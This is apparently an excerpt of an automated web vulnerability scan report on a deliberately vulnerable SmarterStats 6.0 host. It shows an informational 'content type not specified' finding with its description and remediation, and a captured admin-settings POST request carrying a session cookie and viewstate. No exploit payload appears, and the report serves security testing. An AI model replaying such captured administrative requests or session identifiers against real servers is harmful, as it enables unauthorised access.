                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               
           |0|hiddenField|__LASTFOCUS||0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||960|hiddenField|__VIEWSTATE|/wEPDwUJMjU1NDEwNjEyDxYEHhBfX19SZXN1bHRGYWlsdXJlBXFQbGVhc2UgZW50ZXIgeW91ciBTaXRlIElELiAgVGhlIFNpdGUgSUQgaXMgdGhlIG51bWJlciBhc3NpZ25lZCB0byB0aGUgcGFydGljdWxhciBzaXRlIHlvdSBhcmUgdHJ5aW5nIHRvIGxvZ2luIHRvLh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYCAgUPZBYCZg9kFgYCAw9kFgICAQ8WAh4EVGV4dAWTATxkaXYgY2xhc3M9IlRpcFRleHRGYWlsdXJlIj5QbGVhc2UgZW50ZXIgeW91ciBTaXRlIElELiAgVGhlIFNpdGUgSUQgaXMgdGhlIG51bWJlciBhc3NpZ25lZCB0byB0aGUgcGFydGljdWxhciBzaXRlIHlvdSBhcmUgdHJ5aW5nIHRvIGxvZ2luIHRvLjwvZGl2PmQCBQ9kFgICDQ8QDxYCHwIFC1JlbWVtYmVyIG1lZGRkZAIHD2QWBgIBDxBkEBUCFFVzZSBCcm93c2VyIExhbmd1YWdlB0VuZ2xpc2gVAgACZW4UKwMCZ2cWAWZkAgMPDxYCHgtOYXZpZ2F0ZVVSTAVjaHR0cDovL2hlbHAuc21hcnRlcnRvb2xzLmNvbS9TbWFydGVyU3RhdHMvdjYvZGVmYXVsdC5hc3B4P3A9VSZ2PTYuMC4zOTMyJmxhbmc9ZW4tVVMmcGFnZT1Mb2dpbkFkbWluZGQCBw8PFgIeCEltYWdlVXJsBQYvcy5naWZkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2vr+FVUo91S0uyVJaRG08c2CLXdohZ5hj2jUIfmzCCp0A==|0|asyncPostBackControlIDs|||0|postBackControlIDs|||20|updatePanelIDs||tctl00$UpdatePanel1,|0|childUpdatePanelIDs|||19|panelsToRefreshIDs||ctl00$UpdatePanel1,|2|asyncPostBackTimeout||90|10|formAction||login.aspx|33|pageTitle||SmarterStats Login - SmarterStats|251|scriptBlock|ScriptContentWithTags|{"text":"\r\n\t\t\t\t\t\t$(document).ready(function() {\r\n\t\t\t\t\t\t\t$(\u0027select\u0027).each(function() {\r\n\t\t\t\t\t\t\t\tif ($(this).width() \u003e 180) $(this).width(180);\r\n\t\t\t\t\t\t\t});\r\n\t\t\t\t\t\t}); ","type":"text/javascript"}|184|scriptBlock|ScriptPath|/ScriptResource.axd?d=J4GaAPvIQnKMlo_D4Qzm0xa_SfNPfhG-b75huVuGxjWeCTjnztP__eaRa_pbROzW4k2QpoHJQ-uBs4nJPYlOSUcDyDiDF_VzNI93UxMsc1qsbj8BlU_60tzY90-zez8Je4ZNE7PKenoQMyfzxRT0cg2&t=41e66e32|19|focus||ctl00_MPH_txtSiteId|

11. Content type is not specified  previous
There are 14 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


11.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmDefaultSiteSettings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/Defaults/frmDefaultSiteSettings.aspx

Request

POST /Admin/Defaults/frmDefaultSiteSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmDefaultSiteSettings.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminSettings"}; ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c;
Content-Type: application/x-www-form-urlencoded
Content-Length: 20129

ctl00%24MPH%24txtDefaultDocuments_SettingText=%0d%0aindex.htm%0d%0aindex.html%0d%0adefault.asp%0d%0adefault.aspx&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&__EVENTTARGET=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&__EVENTARGUMENT=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=1&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24lstDefaultLogFileDays_SettingDropDown=1&ctl00%24MPH%24txtDefaultSmarterLogDirText_SettingText=C%3a%5cSmarterLogs%5c&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&__VIEWSTATE=%2fwEPDwULLTE1NjY5OTMyNTMPFgQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFggCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTseB1Zpc2libGVoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCQ9kFgICAQ9kFgJmD2QWAgIBD2QWBgICD2QWAgIBD2QWBmYPZBYCAgEPZBYCAgIPDxYCHwQFD0M6XFNtYXJ0ZXJMb2dzXGRkAgEPZBYCAgEPZBYCZg8QZBAVVygoR01ULTEyOjAwKSBJbnRlcm5hdGlvbmFsIERhdGUgTGluZSBXZXN0IChHTVQtMTE6MDApIE1pZHdheSBJc2xhbmQsIFNhbW9hEihHTVQtMTA6MDApIEhhd2FpaRIoR01ULTA5OjAwKSBBbGFza2EkKEdNVC0wODowMCkgVGlqdWFuYSwgQmFqYSBDYWxpZm9ybmlhJihHTVQtMDg6MDApIFBhY2lmaWMgVGltZSAoVVMgJiBDYW5hZGEpLShHTVQtMDc6MDApIENoaWh1YWh1YSwgTGEgUGF6LCBNYXphdGxhbiAtIE5ldycoR01ULTA3OjAwKSBNb3VudGFpbiBUaW1lIChVUyAmIENhbmFkYSkTKEdNVC0wNzowMCkgQXJpem9uYS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBPbGQYKEdNVC0wNjowMCkgU2Fza2F0Y2hld2FuNShHTVQtMDY6MDApIEd1YWRhbGFqYXJhLCBNZXhpY28gQ2l0eSwgTW9udGVycmV5IC0gT2xkJihHTVQtMDY6MDApIENlbnRyYWwgVGltZSAoVVMgJiBDYW5hZGEpNShHTVQtMDY6MDApIEd1YWRhbGFqYXJhLCBNZXhpY28gQ2l0eSwgTW9udGVycmV5IC0gTmV3GyhHTVQtMDY6MDApIENlbnRyYWwgQW1lcmljYSYoR01ULTA1OjAwKSBFYXN0ZXJuIFRpbWUgKFVTICYgQ2FuYWRhKRooR01ULTA1OjAwKSBJbmRpYW5hIChFYXN0KSsoR01ULTA1OjAwKSBCb2dvdGEsIExpbWEsIFF1aXRvLCBSaW8gQnJhbmNvEyhHTVQtMDQ6MzApIENhcmFjYXMSKEdNVC0wNDowMCkgTWFuYXVzIihHTVQtMDQ6MDApIEF0bGFudGljIFRpbWUgKENhbmFkYSkSKEdNVC0wNDowMCkgTGEgUGF6FChHTVQtMDQ6MDApIFNhbnRpYWdvGChHTVQtMDM6MzApIE5ld2ZvdW5kbGFuZCQoR01ULTAzOjAwKSBCdWVub3MgQWlyZXMsIEdlb3JnZXRvd24VKEdNVC0wMzowMCkgR3JlZW5sYW5kFChHTVQtMDM6MDApIEJyYXNpbGlhFihHTVQtMDM6MDApIE1vbnRldmlkZW8YKEdNVC0wMjowMCkgTWlkLUF0bGFudGljEihHTVQtMDE6MDApIEF6b3JlcxooR01ULTAxOjAwKSBDYXBlIFZlcmRlIElzLiUoR01UKSBDYXNhYmxhbmNhLCBNb25yb3ZpYSwgUmV5a2phdmlrPShHTVQpIEdyZWVud2ljaCBNZWFuIFRpbWUgOiBEdWJsaW4sIEVkaW5idXJnaCwgTGlzYm9uLCBMb25kb249KEdNVCswMTowMCkgQmVsZ3JhZGUsIEJyYXRpc2xhdmEsIEJ1ZGFwZXN0LCBManVibGphbmEsIFByYWd1ZSwoR01UKzAxOjAwKSBTYXJhamV2bywgU2tvcGplLCBXYXJzYXcsIFphZ3JlYi8oR01UKzAxOjAwKSBCcnVzc2VscywgQ29wZW5oYWdlbiwgTWFkcmlkLCBQYXJpczwoR01UKzAxOjAwKSBBbXN0ZXJkYW0sIEJlcmxpbiwgQmVybiwgUm9tZSwgU3RvY2tob2xtLCBWaWVubmEfKEdNVCswMTowMCkgV2VzdCBDZW50cmFsIEFmcmljYScoR01UKzAyOjAwKSBBdGhlbnMsIEJ1Y2hhcmVzdCwgSXN0YW5idWwSKEdNVCswMjowMCkgQmVpcnV0EShHTVQrMDI6MDApIEFtbWFuFShHTVQrMDI6MDApIEplcnVzYWxlbRQoR01UKzAyOjAwKSBXaW5kaG9lazkoR01UKzAyOjAwKSBIZWxzaW5raSwgS3lpdiwgUmlnYSwgU29maWEsIFRhbGxpbm4sIFZpbG5pdXMcKEdNVCswMjowMCkgSGFyYXJlLCBQcmV0b3JpYREoR01UKzAyOjAwKSBNaW5zaxEoR01UKzAyOjAwKSBDYWlybxMoR01UKzAzOjAwKSBOYWlyb2JpLShHTVQrMDM6MDApIE1vc2NvdywgU3QuIFBldGVyc2J1cmcsIFZvbGdvZ3JhZBooR01UKzAzOjAwKSBLdXdhaXQsIFJpeWFkaBMoR01UKzAzOjAwKSBCYWdoZGFkEyhHTVQrMDM6MDApIFRiaWxpc2kSKEdNVCswMzozMCkgVGVocmFuHShHTVQrMDQ6MDApIEFidSBEaGFiaSwgTXVzY2F0IihHTVQrMDQ6MDApIENhdWNhc3VzIFN0YW5kYXJkIFRpbWUQKEdNVCswNDowMCkgQmFrdRMoR01UKzA0OjAwKSBZZXJldmFuEShHTVQrMDQ6MzApIEthYnVsGChHTVQrMDU6MDApIEVrYXRlcmluYnVyZygoR01UKzA1OjAwKSBJc2xhbWFiYWQsIEthcmFjaGksIFRhc2hrZW50HyhHTVQrMDU6MzApIFNyaSBKYXlhd2FyZGVuZXB1cmEvKEdNVCswNTozMCkgQ2hlbm5haSwgS29sa2F0YSwgTXVtYmFpLCBOZXcgRGVsaGkVKEdNVCswNTo0NSkgS2F0aG1hbmR1HyhHTVQrMDY6MDApIEFsbWF0eSwgTm92b3NpYmlyc2sZKEdNVCswNjowMCkgQXN0YW5hLCBEaGFrYRwoR01UKzA2OjMwKSBZYW5nb24gKFJhbmdvb24pFyhHTVQrMDc6MDApIEtyYXNub3lhcnNrIyhHTVQrMDc6MDApIEJhbmdrb2ssIEhhbm9pLCBKYWthcnRhEShHTVQrMDg6MDApIFBlcnRoMShHTVQrMDg6MDApIEJlaWppbmcsIENob25ncWluZywgSG9uZyBLb25nLCBVcnVtcWkhKEdNVCswODowMCkgSXJrdXRzaywgVWxhYW4gQmF0YWFyEihHTVQrMDg6MDApIFRhaXBlaSMoR01UKzA4OjAwKSBLdWFsYSBMdW1wdXIsIFNpbmdhcG9yZRMoR01UKzA5OjAwKSBZYWt1dHNrEShHTVQrMDk6MDApIFNlb3VsIShHTVQrMDk6MDApIE9zYWthLCBTYXBwb3JvLCBUb2t5bxQoR01UKzA5OjMwKSBBZGVsYWlkZRIoR01UKzA5OjMwKSBEYXJ3aW4eKEdNVCsxMDowMCkgR3VhbSwgUG9ydCBNb3Jlc2J5JyhHTVQrMTA6MDApIENhbmJlcnJhLCBNZWxib3VybmUsIFN5ZG5leRcoR01UKzEwOjAwKSBWbGFkaXZvc3RvaxQoR01UKzEwOjAwKSBCcmlzYmFuZRIoR01UKzEwOjAwKSBIb2JhcnQvKEdNVCsxMTowMCkgTWFnYWRhbiwgU29sb21vbiBJcy4sIE5ldyBDYWxlZG9uaWEpKEdNVCsxMjowMCkgRmlqaSwgS2FtY2hhdGthLCBNYXJzaGFsbCBJcy4gKEdNVCsxMjowMCkgQXVja2xhbmQsIFdlbGxpbmd0b24WKEdNVCsxMzowMCkgTnVrdSdhbG9mYRVXATABMQEyATMLLTIxNDc0ODM1NzkBNAstMjE0NzQ4MzU4MAIxMAIxNQIxMwIyNQIzMAIyMAstMjE0NzQ4MzU4MQIzMwIzNQI0MAI0NQstMjE0NzQ4MzU3MwstMjE0NzQ4MzU3NgI1MAI1NQI1NgI2MAI3MAI3MwI2NQstMjE0NzQ4MzU3NQI3NQI4MAI4MwI5MAI4NQI5NQMxMDADMTA1AzExMAMxMTMDMTMwCy0yMTQ3NDgzNTgzCy0yMTQ3NDgzNTgyAzEzNQstMjE0NzQ4MzU3OAMxMjUDMTQwAzExNQMxMjADMTU1AzE0NQMxNTADMTU4Cy0yMTQ3NDgzNTc3AzE2MAMxNjUDMTcwCy0yMTQ3NDgzNTg0Cy0yMTQ3NDgzNTc0AzE3NQMxODADMTg1AzIwMAMxOTADMTkzAzIwMQMxOTUDMjAzAzIwNwMyMDUDMjI1AzIxMAMyMjcDMjIwAzIxNQMyNDADMjMwAzIzNQMyNTADMjQ1AzI3NQMyNTUDMjcwAzI2MAMyNjUDMjgwAzI4NQMyOTADMzAwFCsDV2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgMPZBYCZg8PFgQeCENzc0NsYXNzBQ5JbmRlbnQgU2V0dGluZx4EXyFTQgICZBYCAgMPDxYCHwQFMGluZGV4Lmh0bQ0KaW5kZXguaHRtbA0KZGVmYXVsdC5hc3ANCmRlZmF1bHQuYXNweGRkAgQPZBYCAgEPZBYEZg9kFgICAQ9kFgJmDxBkEBUlDE5ldmVyIERlbGV0ZRVEZWxldGUgYWZ0ZXIgMSBtb250aHMVRGVsZXRlIGFmdGVyIDIgbW9udGhzFURlbGV0ZSBhZnRlciAzIG1vbnRocxVEZWxldGUgYWZ0ZXIgNCBtb250aHMVRGVsZXRlIGFmdGVyIDUgbW9udGhzFURlbGV0ZSBhZnRlciA2IG1vbnRocxVEZWxldGUgYWZ0ZXIgNyBtb250aHMVRGVsZXRlIGFmdGVyIDggbW9udGhzFURlbGV0ZSBhZnRlciA5IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTAgbW9udGhzFkRlbGV0ZSBhZnRlciAxMSBtb250aHMWRGVsZXRlIGFmdGVyIDEyIG1vbnRocxZEZWxldGUgYWZ0ZXIgMTMgbW9udGhzFkRlbGV0ZSBhZnRlciAxNCBtb250aHMWRGVsZXRlIGFmdGVyIDE1IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTYgbW9udGhzFkRlbGV0ZSBhZnRlciAxNyBtb250aHMWRGVsZXRlIGFmdGVyIDE4IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTkgbW9udGhzFkRlbGV0ZSBhZnRlciAyMCBtb250aHMWRGVsZXRlIGFmdGVyIDIxIG1vbnRocxZEZWxldGUgYWZ0ZXIgMjIgbW9udGhzFkRlbGV0ZSBhZnRlciAyMyBtb250aHMWRGVsZXRlIGFmdGVyIDI0IG1vbnRocxZEZWxldGUgYWZ0ZXIgMjUgbW9udGhzFkRlbGV0ZSBhZnRlciAyNiBtb250aHMWRGVsZXRlIGFmdGVyIDI3IG1vbnRocxZEZWxldGUgYWZ0ZXIgMjggbW9udGhzFkRlbGV0ZSBhZnRlciAyOSBtb250aHMWRGVsZXRlIGFmdGVyIDMwIG1vbnRocxZEZWxldGUgYWZ0ZXIgMzEgbW9udGhzFkRlbGV0ZSBhZnRlciAzMiBtb250aHMWRGVsZXRlIGFmdGVyIDMzIG1vbnRocxZEZWxldGUgYWZ0ZXIgMzQgbW9udGhzFkRlbGV0ZSBhZnRlciAzNSBtb250aHMWRGVsZXRlIGFmdGVyIDM2IG1vbnRocxUlATABMQEyATMBNAE1ATYBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjMCMjQCMjUCMjYCMjcCMjgCMjkCMzACMzECMzICMzMCMzQCMzUCMzYUKwMlZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgEPZBYCAgEPZBYCZg8QZBAVNAxOZXZlciBEZWxldGUTRGVsZXRlIGFmdGVyIDEgZGF5cxNEZWxldGUgYWZ0ZXIgMiBkYXlzE0RlbGV0ZSBhZnRlciAzIGRheXMTRGVsZXRlIGFmdGVyIDQgZGF5cxNEZWxldGUgYWZ0ZXIgNSBkYXlzE0RlbGV0ZSBhZnRlciA2IGRheXMTRGVsZXRlIGFmdGVyIDcgZGF5cxNEZWxldGUgYWZ0ZXIgOCBkYXlzE0RlbGV0ZSBhZnRlciA5IGRheXMURGVsZXRlIGFmdGVyIDEwIGRheXMURGVsZXRlIGFmdGVyIDExIGRheXMURGVsZXRlIGFmdGVyIDEyIGRheXMURGVsZXRlIGFmdGVyIDEzIGRheXMURGVsZXRlIGFmdGVyIDE0IGRheXMURGVsZXRlIGFmdGVyIDIxIGRheXMVRGVsZXRlIGFmdGVyIDEgbW9udGhzFURlbGV0ZSBhZnRlciAyIG1vbnRocxVEZWxldGUgYWZ0ZXIgMyBtb250aHMVRGVsZXRlIGFmdGVyIDQgbW9udGhzFURlbGV0ZSBhZnRlciA1IG1vbnRocxVEZWxldGUgYWZ0ZXIgNiBtb250aHMVRGVsZXRlIGFmdGVyIDcgbW9udGhzFURlbGV0ZSBhZnRlciA4IG1vbnRocxVEZWxldGUgYWZ0ZXIgOSBtb250aHMWRGVsZXRlIGFmdGVyIDEwIG1vbnRocxZEZWxldGUgYWZ0ZXIgMTEgbW9udGhzFkRlbGV0ZSBhZnRlciAxMiBtb250aHMWRGVsZXRlIGFmdGVyIDEzIG1vbnRocxZEZWxldGUgYWZ0ZXIgMTQgbW9udGhzFkRlbGV0ZSBhZnRlciAxNSBtb250aHMWRGVsZXRlIGFmdGVyIDE2IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTcgbW9udGhzFkRlbGV0ZSBhZnRlciAxOCBtb250aHMWRGVsZXRlIGFmdGVyIDE5IG1vbnRocxZEZWxldGUgYWZ0ZXIgMjAgbW9udGhzFkRlbGV0ZSBhZnRlciAyMSBtb250aHMWRGVsZXRlIGFmdGVyIDIyIG1vbnRocxZEZWxldGUgYWZ0ZXIgMjMgbW9udGhzFkRlbGV0ZSBhZnRlciAyNCBtb250aHMWRGVsZXRlIGFmdGVyIDI1IG1vbnRocxZEZWxldGUgYWZ0ZXIgMjYgbW9udGhzFkRlbGV0ZSBhZnRlciAyNyBtb250aHMWRGVsZXRlIGFmdGVyIDI4IG1vbnRocxZEZWxldGUgYWZ0ZXIgMjkgbW9udGhzFkRlbGV0ZSBhZnRlciAzMCBtb250aHMWRGVsZXRlIGFmdGVyIDMxIG1vbnRocxZEZWxldGUgYWZ0ZXIgMzIgbW9udGhzFkRlbGV0ZSBhZnRlciAzMyBtb250aHMWRGVsZXRlIGFmdGVyIDM0IG1vbnRocxZEZWxldGUgYWZ0ZXIgMzUgbW9udGhzFkRlbGV0ZSBhZnRlciAzNiBtb250aHMVNAEwATEBMgEzATQBNQE2ATcBOAE5AjEwAjExAjEyAjEzAjE0AjIxAjMwAjYwAjkwAzEyMAMxNTADMTgwAzIxMAMyNDADMjcwAzMwMAMzMzADMzYwAzM5MAM0MjADNDUwAzQ4MAM1MTADNTQwAzU3MAM2MDADNjMwAzY2MAM2OTADNzIwAzc1MAM3ODADODEwAzg0MAM4NzADOTAwAzkzMAM5NjADOTkwBDEwMjAEMTA1MAQxMDgwFCsDNGdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIGD2QWBAIBD2QWAmYPZBYGZg9kFgICAQ9kFgICAg8PFgIfBAUBNWRkAgEPZBYCAgEPZBYCAgIPDxYCHwQFATVkZAICD2QWAgIBD2QWAgICDw8WAh8EBQMxMDBkZAIDD2QWAmYPZBYCZg9kFgICAQ9kFgJmDxAPFgoeDURhdGFUZXh0RmllbGQFBG5hbWUeDkRhdGFWYWx1ZUZpZWxkBQJpZB4LXyFEYXRhQm91bmRnHwUFDENoZWNrYm94TGlzdB8GAgJkEBUWBkdvb2dsZQVZYWhvbwNBc2sEQmluZwtHb29nbGUgKEFVKQtHb29nbGUgKEJSKQtHb29nbGUgKENBKQtHb29nbGUgKENOKQtHb29nbGUgKERFKQtHb29nbGUgKEVTKQtHb29nbGUgKEZSKQtHb29nbGUgKEhLKQtHb29nbGUgKElOKQtHb29nbGUgKElMKQtHb29nbGUgKElUKQtHb29nbGUgKEpQKQtHb29nbGUgKEtSKQtHb29nbGUgKE1YKQtHb29nbGUgKE5MKQtHb29nbGUgKFRXKQtHb29nbGUgKFJVKQtHb29nbGUgKFVLKRUWATEBMgE0ATUBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjQCMjMUKwMWZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkGAQFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYYBSRjdGwwMCRNUEgkY2hrU2VvRW5hYmxlZF9TZXR0aW5nQ2hlY2sFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMAVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMwVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ0BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDUFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNgVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ3BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDgFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkOQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMgVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMwVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNgVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNwVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTMPMtwLAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW4